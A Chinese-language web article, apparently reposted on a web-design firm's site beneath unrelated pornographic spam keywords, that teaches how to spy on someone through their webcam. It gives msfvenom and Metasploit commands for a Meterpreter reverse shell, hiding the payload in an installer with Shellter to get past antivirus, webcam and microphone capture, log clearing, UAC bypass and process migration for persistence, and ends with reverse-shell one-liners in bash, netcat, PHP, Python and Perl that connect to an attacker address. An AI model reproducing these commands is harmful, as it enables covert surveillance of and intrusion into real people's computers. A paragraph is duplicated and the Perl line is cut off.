真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

如何使用反向Shell控制攝像頭

這篇文章給大家分享的是有關(guān)如何使用反向Shell控制攝像頭的內(nèi)容。小編覺得挺實(shí)用的,因此分享給大家做個(gè)參考,一起跟隨小編過來看看吧。

創(chuàng)新互聯(lián)建站專注為客戶提供全方位的互聯(lián)網(wǎng)綜合服務(wù),包含不限于網(wǎng)站制作、做網(wǎng)站、依蘭網(wǎng)絡(luò)推廣、小程序定制開發(fā)、依蘭網(wǎng)絡(luò)營銷、依蘭企業(yè)策劃、依蘭品牌公關(guān)、搜索引擎seo、人物專訪、企業(yè)宣傳片、企業(yè)代運(yùn)營等,從售前售中售后,我們都將竭誠為您服務(wù),您的肯定,是我們最大的嘉獎(jiǎng);創(chuàng)新互聯(lián)建站為所有大學(xué)生創(chuàng)業(yè)者提供依蘭建站搭建服務(wù),24小時(shí)服務(wù)熱線:18982081108,官方網(wǎng)址:www.cdcxhl.com

如果你已經(jīng)用膠條封住了你的網(wǎng)絡(luò)攝像頭,你可能是因?yàn)槁犝f過黑客或NSA可以遠(yuǎn)程監(jiān)視你。那么問題來了,這些你素未謀面人又是如何遠(yuǎn)程連接到你的機(jī)器并監(jiān)視你的呢?

這可能是因?yàn)槟銓⒛愕腃CTV,IP攝像頭公開暴露在了互聯(lián)網(wǎng)上,而攻擊者又在Shodan等網(wǎng)站上發(fā)現(xiàn)了它們。加之你又沒有更改它們的默認(rèn)密碼和bam,導(dǎo)致攻擊者順利控制了你的攝像頭,并對你的一舉一動進(jìn)行監(jiān)視。

以上是物聯(lián)網(wǎng)攝像頭最常見的安全問題。但如果是內(nèi)置的網(wǎng)絡(luò)攝像頭,那么更可能的解釋是攻擊者通過Meterpreter payload入侵并控制了它。使用Meterpreter攻擊者可以獲取到一個(gè)反向shell,這也是本文將要討論的內(nèi)容。有關(guān)Meterpreter的更多信息,請參閱:https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/

這里,你可能有個(gè)疑問。為什么攻擊者不直接訪問你的機(jī)器,而是通過一個(gè)反向shell呢?其實(shí)原因很簡單,因?yàn)橹苯釉L問的方式很可能會被阻止。相比起出站流量,入站流量更容易受到限制。另一方面,如果我們主動進(jìn)行連接,那么目標(biāo)機(jī)器更有可能放行該流量。這是因?yàn)槟繕?biāo)機(jī)器想要與我們的機(jī)器建立連接。

如何使用反向Shell控制攝像頭

msfvenom是一個(gè)框架,我們將用它來獲取一個(gè)反向shell。它已被預(yù)裝在了Parrot和Kali上。首先,讓我們運(yùn)行以下命令來創(chuàng)建Meterpreter reverse TCP shell payload。

msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.X.X LPORT=4444 -o /home/parrot/name.exe

如何使用反向Shell控制攝像頭

創(chuàng)建完成后,現(xiàn)在讓我們來上傳它..........blocked。這是因?yàn)镸eterPreter payload名聲在外,早已被各個(gè)安全軟件所標(biāo)記,因此大多數(shù)的安全軟件都能夠發(fā)現(xiàn)阻止/隔離它。

如何使用反向Shell控制攝像頭

我們可以嘗試使用一個(gè)名為Shellter的工具,來更改其哈希并將反向shell嵌入到另一個(gè)文件當(dāng)中。之所以選擇將shell嵌入到一個(gè)安裝文件中,是因?yàn)榇蠖鄶?shù)安裝文件需要以管理員身份運(yùn)行。正如你在之后將看到的那樣,以管理員身份運(yùn)行漏洞利用程序,可以為我們省去很多的麻煩。

你可以通過shelter來直接啟動它。同樣,它已被預(yù)裝在了Parrot和Kali上。

如何使用反向Shell控制攝像頭

讓我們使用Auto [A]并定位我為本例創(chuàng)建的可執(zhí)行文件。

如何使用反向Shell控制攝像頭

接下來,我們選擇反向TCP shell并輸入我們機(jī)器的IP和端口(攻擊者)。完成后,它會將shell嵌入到你選擇的exe文件中,以便你將其上傳到目標(biāo)機(jī)器?,F(xiàn)在你需要通過一種方法將它放到目標(biāo)機(jī)器上,但對于本例我將復(fù)制并粘貼。

雖然,我們隱藏了Meterpreter shell,但AV還是成功地檢測到了它。為了便于我們的演示,我們現(xiàn)在暫時(shí)先將AV關(guān)閉。當(dāng)然,在現(xiàn)實(shí)場景中攻擊者不可能像我這么隨意,更多的是通過技術(shù)手段擊潰AV,或是創(chuàng)建一個(gè)目標(biāo)無法檢測的payload。

然而,盡管屏蔽了Meterpreter外殼,AV仍設(shè)法檢測到它。 我現(xiàn)在就打算把它關(guān)掉,因?yàn)槲铱梢浴?在現(xiàn)實(shí)世界中,攻擊者會將AV癱瘓或使其盲目,以便他們可以降低有效載荷。

現(xiàn)在,讓我們運(yùn)行它。

在開始之前,讓我們在攻擊機(jī)機(jī)上加載msfconsole(Metasploit)并運(yùn)行以下命令:

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.X.X
set LPORT 4444
run

如何使用反向Shell控制攝像頭

你的會話將偵聽反向shell腳本中指定的端口和IP?,F(xiàn)在,我們以用戶身份運(yùn)行exploit:

如何使用反向Shell控制攝像頭

正如你在右側(cè)所看到的,我們有幾次會話建立失敗的情況。這就是我之前提到的為什么需要用戶以管理員身份運(yùn)行的原因。那樣就可以順利運(yùn)行和注入所有的腳本和DLL。如果用戶以管理員身份運(yùn)行,你將不會看到任何失敗的情況。如下所示:

如何使用反向Shell控制攝像頭

成功獲取反向shell后,現(xiàn)在我們就可以針對目標(biāo)機(jī)器執(zhí)行我們想要的操作了。如果你的目標(biāo)是攝像頭,那么你可以執(zhí)行以下操作:

Show Webcams: webcam_list
Webcam Snap Help: webcam_snap -h
Take a Picture and don’t load the image after: webcam_snap -i 1 -v false
Record audio: record_mic
Record Webcam: run webcam -p /var/www/
Stop recording: run webcam -s

如何使用反向Shell控制攝像頭

不僅僅是網(wǎng)絡(luò)攝像頭(Webcams)。你還可以執(zhí)行更多其他的命令。例如:清除所有日志(應(yīng)用程序,系統(tǒng)和安全日志):clearev

這只是一個(gè)例子,黑客也不太可能會運(yùn)行它。因?yàn)檫@么做反而會打草驚蛇提醒了管理員。如果一臺機(jī)器你發(fā)現(xiàn)所有日志都被清除了,那么你可以初步斷定有人已經(jīng)使用過它了。相反,攻擊者更有可能的是刪除選擇的事件來掩蓋他們的痕跡。

所有這些都需要管理員權(quán)限,而你的用戶可能無法使用提升的權(quán)限來運(yùn)行它。那么,你可以使用像bypassuac_comhijacker這樣的命令。首先,你仍需要得到一個(gè)普通用戶級別的反向shell。

獲得shell后,輸入background并按Enter鍵。這會將當(dāng)前會話移至后臺。然后你就可以針對當(dāng)前會話使用bypassuac_comhijack漏洞利用程序了,如下:

如何使用反向Shell控制攝像頭

然后,你可以回到原始會話并運(yùn)行以下命令:

如何使用反向Shell控制攝像頭

成功運(yùn)行后,你將獲取到一個(gè)admin shell。為了與目標(biāo)機(jī)器建立長期穩(wěn)定的后門連接,我們需要將我們的反向shell隱藏在一個(gè)更為隱蔽和穩(wěn)定的進(jìn)程中(而不是Putty exe或installer文件中)因?yàn)檫@些應(yīng)用一旦被關(guān)閉,我們的連接就將丟失。這就是為什么我們需要盡快遷移我們的反向shell,到那些可以持續(xù)運(yùn)行進(jìn)程中的原因。

如何使用反向Shell控制攝像頭

首先,讓我們查看正在運(yùn)行的進(jìn)程有哪些。

如何使用反向Shell控制攝像頭

找到相對穩(wěn)定的進(jìn)程后,運(yùn)行migrate [PID]

如何使用反向Shell控制攝像頭

然后,它會將你的Meterpreter會話遷移到另一個(gè)進(jìn)程中。這樣即使他們關(guān)閉了被利用的應(yīng)用程序,你的會話也將被保留。

正如你所看到的,Meterpreter非常的強(qiáng)大。但這并不是你獲得反向shell的唯一方法。你還可以使用Netcat。相比起Meterpreter,某些AV供應(yīng)商并不將其視為威脅。你可以點(diǎn)擊此處,查看virustotal中的檢測結(jié)果。

如何使用反向Shell控制攝像頭

你可以在Parrot或Kali上的usr/share/windows-binaries/nc.exe下找到Netcat。將nc.exe上傳到目標(biāo)機(jī)器后,我們可以運(yùn)行nc.exe [Attacker IP] [Port] -e cmd.exe。

如何使用反向Shell控制攝像頭

在攻擊者機(jī)器上我們需要偵聽連接,這可以通過運(yùn)行nc -lvp [Chosen port]命令來完成。

你將獲取到一個(gè)普通用戶權(quán)限的簡單反向shell,這對你來說是一個(gè)好的開始。然后,你可以通過它來進(jìn)一步的利用系統(tǒng)獲得管理員權(quán)限。以下是一些運(yùn)行反向shell的示例:

PHP

php -r ‘$sock=fsockopen(“192.168.0.10”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’

Bash

bash -i >& /dev/tcp/192.168.0.1/8080 0>&1

Netcat Linux

nc 192.168.0.10 1234 -e /bin/sh

Python

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.0.10”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Perl

perl -e ‘use Socket;$i=“192.168.0.10”;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,

感謝各位的閱讀!關(guān)于“如何使用反向Shell控制攝像頭”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,讓大家可以學(xué)到更多知識,如果覺得文章不錯(cuò),可以把它分享出去讓更多的人看到吧!


文章標(biāo)題:如何使用反向Shell控制攝像頭
新聞來源:http://weahome.cn/article/igihce.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部